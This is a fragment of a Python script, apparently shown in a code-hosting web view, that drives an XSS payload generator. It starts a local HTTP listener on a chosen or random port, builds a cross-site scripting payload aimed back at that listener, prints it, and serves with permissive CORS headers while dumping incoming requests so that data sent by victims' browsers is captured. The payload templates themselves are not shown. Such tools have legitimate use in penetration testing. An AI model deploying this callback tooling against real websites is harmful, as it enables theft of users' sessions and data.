if len(payloads) == 0:
|
||||
return None
|
||||
|
||||
return "\n".join(payloads)
|
||||
|
||||
if __name__ == "__main__":
|
||||
|
||||
parser = argparse.ArgumentParser(description="XSS payload generator")
|
||||
parser.add_argument(dest="type", type=str, default=None, help="Payload type")
|
||||
parser.add_argument("-p", "--port", type=int, required=False, default=None, help="Listening port")
|
||||
parser.add_argument("-a", "--addr", type=str, required=False, default=util.get_address(), help="Listening address")
|
||||
args, extra = parser.parse_known_args()
|
||||
|
||||
listen_port = args.port
|
||||
payload_type = args.type.lower()
|
||||
local_address = args.addr
|
||||
extra_args = {}
|
||||
|
||||
for entry in extra:
|
||||
match = re.match(r"(\w+)=(\w+)", entry)
|
||||
if not match:
|
||||
print("Invalid extra argument:", entry)
|
||||
exit()
|
||||
key, value = match.groups()
|
||||
extra_args[key] = value
|
||||
|
||||
# choose random port
|
||||
if listen_port is None:
|
||||
listen_port = random.randint(10000,65535)
|
||||
while util.is_port_in_use(listen_port):
|
||||
listen_port = random.randint(10000,65535)
|
||||
|
||||
http_server = HttpFileServer(local_address, listen_port)
|
||||
payload_type = args.type.lower()
|
||||
url = http_server.get_full_url("/", util.get_address())
|
||||
payload = generate_payload(payload_type, url, **extra_args)
|
||||
if payload is None:
|
||||
print("Unknown payload type: %s" % payload_type)
|
||||
# print("Supported types: ")
|
||||
exit(1)
|
||||
|
||||
print(f"---PAYLOAD---\n{payload}\n---PAYLOAD---\n")
|
||||
|
||||
headers = {
|
||||
"Access-Control-Allow-Origin": "*",
|
||||
"Access-Control-Allow-Methods": "GET, POST, OPTIONS"
|
||||
}
|
||||
|
||||
http_server.addRoute("/", lambda req: (201, b"", headers))
|
||||
http_server.dumpRequest("/")
|
||||
http_server.serve_forever()
|
||||
|
||||
|
||||
Reference in New Issue
Block a user